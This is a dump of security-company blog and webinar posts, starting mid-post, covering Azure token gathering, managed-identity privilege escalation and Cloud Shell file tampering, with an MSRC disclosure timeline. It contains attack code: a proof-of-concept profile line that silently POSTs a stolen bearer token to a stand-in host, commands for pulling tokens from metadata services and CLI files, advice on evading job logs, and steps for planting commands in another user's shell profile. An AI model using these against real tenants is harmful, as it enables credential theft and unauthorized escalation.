Azure subscription.

A Primer on Bearer Tokens

Azure Bearer tokens are the core of authentication/authorization for the Azure APIs. The tokens can be generated from a number of different places, and have a variety of uses, but they are a portable token that can be used for accessing Azure REST APIs. The token is in a JWT format that should give you a little more insight about the user it's issued to, once you pull apart the JWT. For the purposes of this blog, we won't be going into the direct authentication (OAuth/SAML) to login.microsoftonline.com. The examples here will be tied to gathering tokens from existing authenticated sessions or Azure services. For more information on the Microsoft authentication model, here's Microsoft's documentation. An important thing to note here is the scope of the token. If you only request access to https://management.azure.com/, that's all that your token will have access to. If you want access to other services (https://vault.azure.net/) you should request that in the "scope" (or resource) section of the initial request. In some cases, you may need to request multiple tokens to cover the services you're trying to access. There are "refresh" tokens that are normally used for extending scope for other services, but those won't be available in all of our examples below. For the sake of simplicity, each example listed below is scoped to management.azure.com. For more information on the token structure, please consult the Microsoft documentation.

Gathering Tokens

Below is an overview of the different services that we will be gathering bearer tokens from in this blog:

Azure Portal

We'll start things off with an easy token to help explain what these bearer tokens look like. Login to the Azure portal with a proxy enabled, and observe the Bearer token in the Authorization header: Bearer From a pen tester's perspective, you may be able to intercept a user's web traffic in order to get access to this token. This token can then be copied off to be used in other tools/scripts that need to make requests to the management APIs.

Azure CLI Files

The Azure CLI also uses bearer tokens and stores them in the "c:\Users\%USERNAME%\.azure\accessTokens.json" file. These tokens can be directly copied out of the file and used with the management REST APIs, or if you want to use the AZ CLI on your own system with "borrowed" tokens, you can just replace the contents of the file on your own system to assume those tokens. If you're just looking for a quick way to grab tokens from your currently logged in user, here's some basic PowerShell that will help:
gc c:\Users\$env:USERNAME\.azure\accessTokens.json | ConvertFrom-Json
These tokens are scoped to the management.core.windows.net resource, but there should be a refresh token that you can use to request additional tokens. Chris Maddalena from SpecterOps has a great post that helps outline this (and other Azure tips). Lee Kagan and RJ McDown from Lares also put out a series that covers some similar concepts (relating to capturing local Azure credentials) as well (Part 1) (Part 2).

Virtual Machine Managed Identities

In the previous blog, we covered Virtual Machine Managed Identities and gave two proof of concept examples (escalate to Owner, and list storage account keys). You can see the previous blog to get a full overview, but in general, you can authenticate to the VM Metadata service (different from login.microsoftonline.com) as the Virtual Machine, and use the tokens with the REST APIs to take actions. Id E From a Managed Identity VM, you can execute the following PowerShell commands to get a bearer token:
$response = Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
One of the key things to note here is the fact that the Azure metadata service that we authenticate to requires specific headers to be present when making requests for credentials. This helps reduce the potential impact of a Server-Side Request Forgery (SSRF) attack.

Automation Account "RunAs" Accounts

In order to generate a token from an existing Runbook/Automation Account RunAs account, you will need to create a new (or modify an existing) runbook that authenticates the RunAs account, and then access the token with the runbook code. You can use the following code to accomplish this:
# Get Azure Run As Connection Name
$connectionName = "AzureRunAsConnection"

# Get the Service Principal connection details for the Connection name
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName

# Logging in to Azure AD with Service Principal
"Logging in to Azure AD..."
$azcontext = Connect-AzureRMAccount -TenantId $servicePrincipalConnection.TenantId `
-ApplicationId $servicePrincipalConnection.ApplicationId `
-CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

# https://gallery.technet.microsoft.com/scriptcenter/Easily-obtain-AccessToken-3ba6e593
$azureRmProfile = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile
$azureRmProfile
$currentAzureContext = Get-AzureRmContext
$profileClient = New-Object Microsoft.Azure.Commands.ResourceManager.Common.RMProfileClient($azureRmProfile)

$token = $profileClient.AcquireAccessToken($currentAzureContext.Tenant.TenantId)
$token | convertto-json
$token.AccessToken
Keep in mind that this token will be for the Automation Account "RunAs" account, so you will most likely have subscription contributor rights with this token. Added bonus here: if you'd like to stay under the radar, create a new runbook or modify an existing runbook, and use the "Test Pane" to run the code. This will keep the test run from showing up in the jobs logs, and you can still access the token in the output. This heavily redacted screenshot will show you how the output should look. Bearer This code can also be easily modified to post the token data off to a web server that you control (see the next section). This would be helpful if you're looking for a more persistent way to generate these tokens. If you're going that route, you could also set the runbook to run on a schedule, or potentially have it triggered by a webhook. See the previous Automation Account persistence blog for more information on that.

Cloud Shell

The Azure Cloud shell has two ways that it can operate (Bash or PowerShell), but thankfully the same method can be used by both to get a bearer token for a user.
curl https://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s
Bearer I wasn't able to find exact specifics around the source of this localhost service, but given the Cloud Shell architecture, I'm assuming that this "localhost:50342" service is just used to help authenticate Cloud Shell users for existing tools, like the AZ CLI, in the shell. From a pen tester's perspective, it would be most practical to modify a Cloud Shell home directory (See Previous Blog) for another (more privileged) user to capture this token and send it off to a server that you control. This is particularly impactful if your victim Cloud Shell has higher privileges than your current user. By appending the following lines of PowerShell to the profile file, you can have cloud shell quietly send off a new bearer token as a POST request to a web server that you control (example.com). Proof of Concept Code:
$token = (curl https://localhost:50342/oauth2/token --data "resource=https://management.azure.com/" -H Metadata:true -s)
Invoke-WebRequest 'example.com' -Body $token -Method 'POST' | out-null
*For this example, I just set up a Burp Collaborator host (example.com) to post this token to Given that this bearer token doesn't carry a refresh token, you may want to modify the PoC code above to request tokens for multiple resources.

Using the Tokens

Now that we have a token, we will want to make use of it. As a simple proof of concept, we can use the Get-AZStorageKeysREST function in MicroBurst, with a management.azure.com scoped bearer token, to list out any available storage account keys.
Get-AZStorageKeysREST -token YOUR_TOKEN_HERE
This will prompt you for the subscription that you want to use, but you can also specify the desired subscription with the -subscriptionId flag. Stay tuned to the NetSPI blog for future posts, where we will cover how to make use of these tokens with the Azure Rest APIs to do information gathering, privilege escalation, and credential gathering with the Azure APIs and bearer tokens. The initial (and future) scripts will be in the REST folder of the MicroBurst repo:

Conclusion

While this isn't an exhaustive list, there are lots of ways to get bearer tokens in Azure, and while they may have limited permissions (depending on the source), they can be handy for information gathering, persistence, and/or privilege escalation in certain situations. Feel free to let me know if you've had a chance to make use of Azure Bearer tokens down in the comments, or out in the MicroBurst GitHub repository. [post_title] => Gathering Bearer Tokens from Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-bearer-tokens-azure [to_ping] => [pinged] => [post_modified] => 2021-06-11 15:19:21 [post_modified_gmt] => 2021-06-11 15:19:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11373 [menu_order] => 509 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 19769 [post_author] => 53 [post_date] => 2020-03-04 10:41:04 [post_date_gmt] => 2020-03-04 10:41:04 [post_content] =>

Watch the first webinar in our Lunch & Learn Series below!

With the increase in hybrid cloud adoption, that extends traditional active directory domain environments into Azure, penetration tests and red team assessments are more frequently bringing Azure tenants into the engagement scope. Attackers are often finding themselves with an initial foothold in Azure, but lacking in ideas on what an escalation path would look like.

In this webinar, Karl Fosaaen covers some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. In addition to this, he covers some techniques for maintaining that privileged access after an initial escalation. Throughout each section, he shares some of the tools that can be used to help identify and exploit the issues outlined.

https://youtu.be/zzP3HSWyu4M
[post_title] => Adventures in Azure Privilege Escalation Webinar [post_excerpt] => During this webinar, NetSPI’s Karl Fosaaen will cover some of the common initial Azure access vectors, along with a handful of escalation paths for getting full control over an Azure tenant. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adventures-in-azure-privilege-escalation-webinar [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:07:49 [post_modified_gmt] => 2023-03-16 14:07:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19769 [menu_order] => 79 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 17411 [post_author] => 53 [post_date] => 2020-02-26 10:40:32 [post_date_gmt] => 2020-02-26 16:40:32 [post_content] =>
Watch Now

Overview 

Nearly every organization is talking about moving to the cloud, developing a strategy to move to the cloud, in the process of moving to the cloud, or already all in on the cloud. Where do you fall in this journey?  

Join two of NetSPI’s cloud security experts, VP of Research Karl Fosaaen and former CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think they are. 

Key highlights:

Moving to the Cloud 

Cloud security is challenging, and many companies are behind in protecting their cloud assets. Part of the reason is that for years, the cloud was seen as a buzzword, and companies often thought it wouldn’t have much of an impact from a security perspective. Even some experienced security professionals have minimized or overlooked the security challenges associated with the cloud.  

Now, nearly every organization is either: 

  • Talking about moving to the cloud 
  • Developing a strategy to move to the cloud 
  • In the process of moving to the cloud 
  • Already in the cloud 

However, from a security perspective, the narrative has often been:

  • Cloud providers are taking care of security 
  • Cloud security is the same as traditional security 
  • Cloud security expertise has kept pace 
  • Outsourcing your assets reduces risk 

In some cases, individuals within companies have taken shortcuts by adopting the cloud and using cloud applications without information security oversight, which presents significant risks from a security perspective. And this leaves security professionals behind in implementing best practices to effectively protect organizations’ cloud assets. 

Are Your Cloud Assets as Protected as You Think? 

Given the momentum surrounding moving to the cloud and the fact that most security teams have been slow to respond, cloud assets likely aren’t protected as some may think.  

Some challenges with securing cloud assets include:

  • Despite available resources, there are still many ways to configure services incorrectly 
  • Public and non-public breaches seem to happen weekly, and the maturity of information security programs doesn’t seem to influence the likelihood of a breach  
  • A single mistake in a cloud environment could be disastrous 
  • Many of the technologies and designs that have resulted in recent cloud breaches are used in most environments  

Common Cloud Security Challenges  

At NetSPI, our expert human pentesters regularly run cloud penetration tests against client environments. A common pattern is that similar issues are found across different platforms, environments, and verticals.  

Top challenges include:

  • Credentials can be obtained by numerous sources: By utilizing common vulnerabilities, public data exposures, and active credential guessing attacks, attackers can gain access to cloud environments.  
  • Properly configuring permissions can be difficult: Security can often take a backseat when developers are trying to be agile. 
  • Integrating cloud can create risk for on-premise technology: By integrating cloud and on-premise environments, organizations are making it easier for attackers to pivot into traditional (often less secure) network resources.
Be Proactive with Cloud Pentesting

How You Can Protect Yourself 

Given the challenges related to cloud security, it’s important for organizations to understand how to protect against risks. A key to effective cloud security is to shift the mindset away from thinking that the cloud is the same or similar to traditional infrastructure.  

As more breaches happen across organizations, this mindset is changing and security teams are thinking more about cloud-centric activities like conducting risk assessments of cloud infrastructure, establishing recurring processes and methodologies, and adopting and documenting cloud security control checklists. 

Some steps organizations and security teams can take to protect cloud assets include:  

  • Practice proper cloud hygiene  
    • Define requirements 
    • Isolate your development, staging, and product environments 
    • Limit privileges in all environments 
  • Test regularly and fully 
    • Penetration test all the layers of your environment 
    • Utilize cloud configuration reviews  

How Cloud Penetration Testing Differs from External Network Penetration Testing 

With Cloud Penetration Testing compared to External Network Penetration Testing (which is more of the traditional environment review), the cloud penetration test focuses on all of the standard issues we're going to look for on any cloud service. 

While many penetration deliverables are applicable to both external and cloud pentesting, some additional deliverables specific to cloud penetration testing include:

  • Network penetration testing includes internal network layer testing of all virtual machines and services from the cloud virtual networks, along with external network layer testing of externally exposed sources   
  • Configuration of cloud services: review of firewall rules, IAM/RBAC, review of users/roles/groups/policies, review of utilized cloud services (including but not limited to, servers, databases, and serverless computing) 

Are you getting the most out of your penetration testing reports? See our Penetration Testing Report Example to double check. 

Recommendations for Cloud Testing 

For cloud testing to be effective, companies and security teams need to take a proactive role in understanding the full scope of their cloud environments and the services or applications they have, and ensuring systems and services within these cloud environments are being updated.  

Once you have a grasp on the full scope of your cloud environment, some best practices for cloud testing include:

  • Ensure systems and services are updated and patched in accordance with industry/vendor recommendations 
  • Verify IAM/RBAC roles are assigned appropriately 
  • Utilize security groups and firewall rules to limit access between services and virtual machines 
  • Ensure that sensitive information is not written in cleartext to any cloud services, and encrypt data prior to storage 
  • Verify user permissions for any cloud storage containing sensitive data and ensure that the rules represent only the users who require access to the storage 
  • Ensure only the appropriate parties have access to key material for decryption purposes 

Protect Your Assets with NetSPI’s Cloud Penetration Testing  

Whether your company is at the early stages of talking about moving to the cloud, already in the cloud—or at any stage in between—prioritizing cloud security is critical to protecting your cloud assets. 

NetSPI’s Cloud Penetration Testing services can help your business identify vulnerabilities in your AWS, Azure, or GCP cloud infrastructure, reduce organizational risk, and improve cloud security. Our expert cloud pentesters follow manual and automated penetration testing processes and focus on Configuration Review, External Network Cloud Pentesting, and Internal Network Pentesting.  

Learn more about NetSPI’s Cloud Penetration Testing Services to schedule a demo to discuss in more detail.

[wonderplugin_video iframe="https://youtu.be/l3OAJyauhBA" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Best Practices to Protect Your Organization's Cloud Assets [post_excerpt] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => best-practices-to-protect-your-organizations-cloud-assets [to_ping] => [pinged] => [post_modified] => 2024-01-15 14:11:26 [post_modified_gmt] => 2024-01-15 20:11:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17411 [menu_order] => 81 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 17432 [post_author] => 53 [post_date] => 2020-02-21 14:14:45 [post_date_gmt] => 2020-02-21 14:14:45 [post_content] =>
Watch Now

Overview  

When businesses migrate anything to a cloud infrastructure, penetration testers often find several common security gaps. In this webinar, one of NetSPI's cloud security experts, VP of Research Karl Fosaaen, will discuss four common cloud security problems. He’ll also cover how Cloud Penetration Testing can help make your cloud security testing program more effective.

Key highlights: 

What is the Cloud?  

There tends to be a lot of confusion as to what qualifies something in the cloud, and similarly, many different ways to look at the cloud. One of the most important things to understand is the primary cloud hosting services.

The most common cloud hosting services include:

Common Issues with Cloud Security

When data is stored in the cloud, some common issues emerge. The top issues with cloud security include:

1. Data Exposure 

AWS has made headlines because of misconfiguration issues that resulted in credential data or personal information being exposed on the internet unintentionally. All cloud providers are at risk of similar issues. Data exposure is one of the most common challenges cloud pentesters see.  

2. Access Key Exposure 

To access a cloud service, users typically use some type of key, whether for storage services, or SSH keys to get into virtual machines. If attackers find the key, they can gain access to the cloud environment, systems, and sensitive data stored in the cloud.   

3. Privilege Issues 

Each cloud platform has individual user and rights management within the platform. One of the common issues that pentesters run into is that a user may be given excessive rights or privileges to systems that they weren't intended to have access to. 

4. Entry Points to the Internal Network 

Cloud pentesters are frequently seeing that the internal network is becoming more and more integrated with the cloud network via VPN connections. If one of these virtual machines out in the cloud is compromised, an attacker may be able to pivot back to the internal corporate network, and gain access that wasn't necessarily intended through the cloud.

How to Prevent Common Cloud Security Issues 

Businesses can take a few different approaches to assess the security of their cloud environment. One option is integrating cloud service testing into traditional network and application pentesting programs. 

However, for any business hosting applications in the cloud, it’s recommended to perform cloud penetration testing specifically. Outside of traditional penetration testing, you can look deeper into cloud penetration testing, where that takes more of a focus on the overall cloud infrastructure, and not just cloud as an auxiliary to normal pentesting services. 

NetSPI’s comprehensive Cloud Penetration Testing services follow manual and automated pentesting processes to identify vulnerabilities in AWS, Azure, and GCP cloud infrastructure and can guide your team on how to improve cloud security.  

Get started with enhancing your cloud security posture — learn more about NetSPI’s Cloud Penetration Testing Services.

[wonderplugin_video iframe="https://youtu.be/ffBcIkjumBc" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Intro to Cloud Penetration Testing [post_excerpt] => Experts in pen testing cloud apps & infrastructure for vulnerabilities & misconfiguration. Learn about cloud pen testing and common cloud security gaps in this video now. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => intro-to-cloud-penetration-testing [to_ping] => [pinged] => [post_modified] => 2024-01-15 14:09:48 [post_modified_gmt] => 2024-01-15 20:09:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17432 [menu_order] => 83 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 11234 [post_author] => 10 [post_date] => 2020-02-20 07:00:37 [post_date_gmt] => 2020-02-20 07:00:37 [post_content] =>

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it's not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR - Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.

Vmtophat

Important note: Anyone with command execution rights on a Virtual Machine (VM), that has a Managed Identity, can execute commands as that managed identity from the VM.

Here are some potential scenarios that could result in command execution rights on an Azure VM:

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an "Identity" tab that will show the status of that VM's managed identity.

Id

Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).

Iam

From the AZ CLI - AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here's the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn't the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.

Mi List

From the AZ CLI - On the VM

Let's assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the "az login --identity" command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list -–assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don't have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it's not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here's a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication - Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on another VMs via Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk:

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription "Owner" GUID
  4. Add a specific user (see below) to the subscription "Owners" IAM role

The provided code sample can be modified (See: "CHANGE-ME-TO-AN-ID") to add a specific ID to the subscription Owners group.

While this is a little difficult to demo, we can see in the screen shot below that a new principal ID (starting with 64) was added to the owners group as part of the script execution.

Poc

2/25/20 - Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here - get-MIStorageKeys.ps1

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.

[post_title] => Azure Privilege Escalation Using Managed Identities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-privilege-escalation-using-managed-identities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:33 [post_modified_gmt] => 2021-06-08 21:58:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11234 [menu_order] => 528 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [34] => WP_Post Object ( [ID] => 11179 [post_author] => 10 [post_date] => 2019-12-10 07:00:04 [post_date_gmt] => 2019-12-10 07:00:04 [post_content] => TLDR; By default, Azure Subscription Contributors have access to all storage accounts in a subscription. These storage accounts can contain Azure Cloud Shell storage files (Linux home directories) that can contain sensitive information. By modifying these Cloud Shell files, an attacker can execute commands in the Cloud Shell sessions of other users. This can lead to cross-account command execution and privilege escalation.

Intro

The Azure Cloud Shell (Bash or PowerShell) can be a handy way to manage Azure resources, but it can also be a potential source of sensitive data and privilege escalation during a penetration test. Azure Cloud Shell allows users to manage resources in Azure from “anywhere”. This includes shell.azure.com, the Azure mobile app , and the (new-ish and pretty fantastic) Microsoft Terminal application . I haven’t really found a practical way to use the Cloud Shell from the mobile app yet, but it’s an option. Cs Phone E In order to maintain a consistent experience from wherever/whenever you login, the Cloud Shell service keeps files in an Azure Storage account in your subscription. The Cloud Shell will be configured with a storage account of your choosing, and the actual files will be under the File Share Service for that storage account. If you’re using a storage account that was automatically generated from the cloud shell defaults, it will most likely be prefaced with “cs”. Portal For more info on how Azure Cloud Shell persists files, check out this Microsoft documentation - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage

What Can We Do With Cloud Shell Files?

Let’s say that we’ve compromised an AzureAD account that has rights to read/write cloud shell File Shares. Usually this will be a contributor account on the subscription, but you may run into a user that has specific contributor rights to Storage Accounts. Important Note: By default, all subscription Contributor accounts will have read/write access to all subscription Storage Accounts, unless otherwise restricted. With this access, you should be able to download any available files in the Cloud Shell directory, including the acc_ACCT.img file (where ACCT is a name – See Above: acc_john.img). If there are multiple users with Cloud Shell instances in the same Storage Account, there will be multiple folders in the Storage Account. As an attacker, choose the account that you would like to attack (john) and download the IMG file for that account. This file is usually 5 GB, so it may take a minute to download. Download The IMG file is an EXT2 file system, so you can easily mount the file system on a Linux machine. Once mounted on your Linux machine, there are two paths that we can focus on.

Information Disclosure

If the Cloud Shell was used for any real work (Not just accidentally opened once…), there is a chance that the user operating the shell made some mistakes in their commands. If these mistakes were made with any of the Azure PowerShell cmdlets, the resulting error logs would end up in the .Azure (note the capital A) folder in the IMG file system. The NewAzVM cmdlet is particularly vulnerable here, as it can end up logging credentials for local administrator accounts for new virtual machines. In this case, we tried to create a VM with a non-compliant name. This caused an error which resulted in the "Cleartext?" password being logged.
PS Azure:> grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
103341-      }
103349-    },
103356-    "osProfile": {
103375-      "computerName": "asdfghjkllkjhgfdasqweryuioasdgkjalsdfjksasdf",
103445-      "adminUsername": "netspi",
103478:      "adminPassword": "Cleartext?",
103515-      "windowsConfiguration": {}
103548-    },
103555-    "networkProfile": {
103579-      "networkInterfaces": [
103608-        {
If you’re parsing Cloud Shell IMG files, make sure that you look at the .Azure/ErrorRecords files for any sensitive information, as you might find something useful. Additionally, any of the command history files may have some interesting information:
  • .bash_history
  • .local/share/powershell/PSReadLine/ConsoleHost_history.txt

Cross-Account Command Execution

Let’s assume that you’ve compromised the “Bob” account in an Azure subscription. Bob is a Contributor on the subscription and shares the subscription with the “Alice” account. Alice is the owner of the subscription, and a Global Administrator for the Azure tenant. Alice is a Cloud Shell power user and has an instance on the subscription that Bob works on. Csdiagram Since Bob is a Contributor in the subscription, he has the rights (by default) to download any cloud shell .IMG file, including Alice's acc_alice.img. Once downloaded, Bob mounts the IMG file in a Linux system (mount acc_alice.img /mnt/) and appends any commands that he would like to run to the following two files:
  • .bashrc
  • /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
We'll download MicroBurst to the Cloud Shell as a proof of concept:
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> .bashrc
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
Once Bob has added his attacking commands (see suggested commands below), he unmounts the IMG file, and uploads it back to the Azure Storage Account. When you go to upload the file, make sure that you select the “Overwrite if files already exist” box. When the upload has completed, the Cloud Shell environment is ready for the attack. The next Cloud Shell instance launched by the Alice account (from that subscription), will run the appended commands under the context of the Alice account. Note that this same attack could potentially be accomplished by mounting the file share in an Azure Linux VM instead of downloading, modifying, and uploading the file.

Example:

In this example, we've just modified both files to echo "Hello World" as a proof of concept. By modifying both the .bashrc and PowerShell Profile files, we have also ensured that our commands will run regardless of the type of Cloud Shell that is selected. Cloudshell At this point, your options for command execution are endless, but I'd suggest using this to add your current user as a more privileged user (Owner) on the current subscriptions or other subscriptions in the tenant that your victim user has access to. If you're unsure of what subscriptions your victim user has access to, take a look at the .azure/azureProfile.json file in their Cloud Shell directory. Finally, if your target user isn't making use of a Cloud Shell during your engagement, a well placed phishing email with a link to https://shell.azure.com/ could be used to get a user to initiate a Cloud Shell session. Cloudshellphish

MSRC Disclosure Timeline

Both of these issues (Info Disclosure and Privilege Escalation) were submitted to MSRC:
  • 10/21/19 – VULN-011207 and VULN-011212 created and assigned case numbers
  • 10/25/19 - Privilege Elevation issue (VULN-011212) status changed to "Complete"
    • MSRC Response: "Based on our understanding of your report, this is expected behavior. Allowing a user access to storage is the equivalent of allowing access to a home directory. In this case, we are giving end users the ability to control access to storage accounts and file shares. End users should only grant access to trusted users."
  • 10/28/19 - Additional Context sent to MSRC to clarify the standard Storage Account permissions
  • 11/1/19 - Information Disclosure issue (VULN-011207) status changed to "Complete"
    • Truncated MSRC Response: "The engineering team has reviewed your findings, and we have determined that this is the current designed behavior for logging. While this specific logging ability is not described well in our documentation, there is some guidance around storage account creation to limit who has access to the log files - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#create-new-storage.
      In the future, the team is considering the option of adding more detail into the documentation to describe the scenario you reported along with guidance on protecting access to log files. They are also looking into additional protections that can be added into Cloud Shell as new features to better restrict access or obfuscate entries that may contain secrets."
  • 12/4/19 - Cloud Shell privilege escalation issue (VULN-011212) status changed to "Complete"
